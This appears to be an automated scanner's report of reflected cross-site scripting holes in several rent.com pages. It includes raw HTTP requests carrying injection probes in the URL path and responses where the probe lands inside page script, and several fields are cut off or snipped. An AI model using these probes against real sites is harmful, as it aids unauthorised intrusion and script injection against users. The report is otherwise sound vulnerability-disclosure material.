1. Cross-site scripting (reflected)
1.1. http://www.rent.com/dart-ads/moving_resources_home.html [REST URL parameter 1]
1.2. http://www.rent.com/dart-ads/moving_resources_home.html [REST URL parameter 1]
1.3. http://www.rent.com/dart-ads/search-spine.html [pick parameter]
Severity: | High |
Confidence: | Firm |
Host: | http://www.rent.com |
Path: | /dart-ads/moving |
GET /dart-ads977e7%2522%253e%253ca Host: www.rent.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: text/html,application Referer: http://www.rent.com Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: browser=1.2459413186 |
HTTP/1.1 404 Not Found Date: Fri, 14 Oct 2011 18:11:58 GMT Server: Apache Set-Cookie: session=ee893587579c Set-Cookie: CC=133432337; path=/; expires=Wed, 12-Oct-2016 18:11:58 GMT Set-Cookie: RD=; path=/; expires=Fri, 14-Oct-2011 18:12:28 GMT Cache-Control: must-revalidate Expires: Fri, 14 Oct 2011 18:11:59 GMT Last-Modified: Fri, 14 Oct 2011 18:11:58 GMT P3P: CP='ALL DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONo OUR IND PHY ONL UNI COM NAV INT STA' Content-Type: text/html; charset=utf-8 X-Cache: MISS from www.rent.com Content-Length: 21566 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Error 404: ...[SNIP]... <a id="topbar_signin_link_id ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.rent.com |
Path: | /dart-ads/moving |
GET /dart-adsad0db'%3b918dae46df3/moving_resources_home Host: www.rent.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: text/html,application Referer: http://www.rent.com Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: browser=1.2459413186 |
HTTP/1.1 404 Not Found Date: Fri, 14 Oct 2011 18:12:02 GMT Server: Apache Set-Cookie: session=ee893587579c Set-Cookie: CC=133432337; path=/; expires=Wed, 12-Oct-2016 18:12:02 GMT Set-Cookie: RD=0; path=/; expires=Fri, 14-Oct-2011 18:12:32 GMT Cache-Control: must-revalidate Expires: Fri, 14 Oct 2011 18:12:03 GMT Last-Modified: Fri, 14 Oct 2011 18:12:02 GMT P3P: CP='ALL DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONo OUR IND PHY ONL UNI COM NAV INT STA' Content-Type: text/html; charset=utf-8 X-Cache: MISS from www.rent.com Content-Length: 21528 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Error 404: ...[SNIP]... <script type="text/javascript"> $().ready(function() { next_url = '/dart-adsad0db';918dae46df3/moving_resources_home ajax_img = 'http://media.rent.com signin_box_state = 'closed'; var signin_height = 110; var formcookie = Get_Cookie('loginform'); if (f ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.rent.com |
Path: | /dart-ads/search-spine |
GET /dart-ads/search-spine Host: www.rent.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: text/html,application Referer: http://www.rent.com Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: browser=1.2459413186 |
HTTP/1.1 200 OK Date: Fri, 14 Oct 2011 18:12:54 GMT Server: Apache Set-Cookie: session=ee893587579c Set-Cookie: CC=133432337; path=/; expires=Wed, 12-Oct-2016 18:12:54 GMT Set-Cookie: RD=; path=/; expires=Fri, 14-Oct-2011 18:13:24 GMT Cache-Control: must-revalidate Expires: Fri, 14 Oct 2011 18:12:55 GMT P3P: CP='ALL DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONo OUR IND PHY ONL UNI COM NAV INT STA' Content-Type: text/html; charset=utf-8 X-Cache: MISS from www.rent.com Content-Length: 6745 <link href="http://media.rent <body> <div id="movingTools"> <img src="http://media.rent ...[SNIP]... <a href="http://ad ...[SNIP]... |